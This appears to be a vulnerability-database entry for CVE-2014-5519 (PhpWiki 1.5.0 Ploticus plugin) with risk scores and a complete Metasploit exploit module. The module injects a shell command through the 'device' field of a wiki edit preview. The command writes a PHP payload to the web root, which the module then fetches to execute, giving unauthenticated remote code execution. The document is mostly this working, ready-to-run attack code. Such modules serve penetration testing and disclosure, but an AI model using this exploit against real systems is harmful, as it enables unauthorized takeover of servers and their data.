Phpwiki Ploticus Remote Code Execution

2014.09.17
Credit: us3r777
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-5519
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Phpwiki Ploticus Remote Code Execution', 'Description' => %q{ The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection. }, 'Author' => [ 'Benjamin Harris', # Discovery and POC 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-5519' ], [ 'OSVDB', '110576' ], [ 'EDB', '34451'], [ 'URL', 'https://sourceforge.net/p/phpwiki/code/8974/?page=1' ], # This commit prevents exploitation [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/77' ] # The day the vuln went public ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 11 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The full URI path to phpwiki', '/phpwiki']) , ], self.class) end def exploit uri = target_uri.path payload_name = "#{rand_text_alpha(8)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) res = send_request_cgi({ 'uri' => normalize_uri(uri + '/index.php/HeIp'), 'method' => 'POST', 'vars_post' => { 'pagename' => 'HeIp', 'edit[content]' => "<<Ploticus device=\";echo '#{php_payload}' > #{payload_name};\" -prefab= -csmap= data= alt= help= >>", 'edit[preview]' => 'Preview', 'action' => 'edit' } }) if not res or res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end upload_uri = normalize_uri(uri + "/" + payload_name) print_status("#{peer} - Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' }) end end

References:

http://cxsecurity.com/issue/WLB-2014080135
https://sourceforge.net/p/phpwiki/code/8974/?page=1


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top